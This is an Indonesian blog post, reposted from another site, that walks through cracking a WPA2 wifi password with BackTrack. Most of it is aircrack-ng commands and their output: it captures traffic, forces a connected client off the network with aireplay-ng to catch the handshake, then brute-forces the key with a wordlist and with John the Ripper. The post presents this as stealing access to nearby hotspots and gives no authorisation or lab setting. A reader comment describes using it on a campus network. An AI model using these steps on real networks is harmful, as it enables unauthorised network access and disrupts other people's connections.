HACK WPA2 dengan Backtrack (hack hotspot) HACK WPA2 dengan Backtrack (hack hotspot)

Kamis, 23 Februari 2012

HACK WPA2 dengan Backtrack (hack hotspot)

pertama-tama saya ucapkan terimakasih kepada binushacker yang telah mempost dan memberikan izin menyebarkan. nah kali ini saya akan membahas mengenai hack hotspot, meskipun saya sendiri masih belajar hehehhe oke langsung aja, alat yang diperlukan adalah:
 1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda :)
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
 3. Koneksi wireless / wireless card
 4. WPA yang ada di laptop anda.
 5. John the ripper password cracker.
 6. Aircrack-ng & airodump-ng (Aircrack package)

yo mulai, gini langkahnya 
1.Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya: root@binushacker:~# airmon-ng start wlan0 Interface Chipset Driver wlan0 Zydas zd1211 zd1211rw – [phy1] (monitor mode enabled on mon0) 

 2. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut: root@binushacker:~# airodump-ng mon0 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless

3.Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless root@binushacker:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2 CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless BSSID STATION PWR Rate Lost Packets Probes 38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu. Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan?

4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut: root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0 21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11 21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs] root@binushacker:~# 

5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut: CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless BSSID STATION PWR Rate Lost Packets Probes 38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161

6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya: root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap Opening /tmp/wpa2-01.cap Opening /tmp/wpa2-02.cap Reading packets, please wait... Aircrack-ng 1.1 r1904 [00:00:00] 48 keys tested (489.60 k/s) KEY FOUND! [ W!R3L3$$PWD ] Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B root@binushacker:~# Nah, passwordnya ketemu: W!R3L3$$PWD

7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper: root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap Opening /tmp/wpa2-01.cap Opening /tmp/wpa2-02.cap Reading packets, please wait... Aircrack-ng 1.1 r1904 [00:00:22] 11484 keys tested (534.50 k/s) KEY FOUND! [ W!R3L3$$PWD ] Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B root@binushacker:~# nah ini video.a

1 komentar:

  1. gan..ko ane pyah banget dapat handshakenya ya gan, padahal ACKs nya sperti ini gan [0][67]ACKs... begitu seterusnya gan, apa ada solusinya gan, terus ane pernah dapatakan handshake wifi kampus, karena kepepet dengan waktu, ane kerjain proses crack nya dirumah dengna cara menyimpan file hasil snifing tersebut. apa boleh seperti itu gan, dan ternyata tidak berhasil mendpatkan key nya stelah saya melakukan cracking dirumah. tolong pencerahannya ya gan, pleassss banget, soalnya dah sebulan lebih saya perjuangkan, tapi belum berhasil juga gan..

    BalasHapus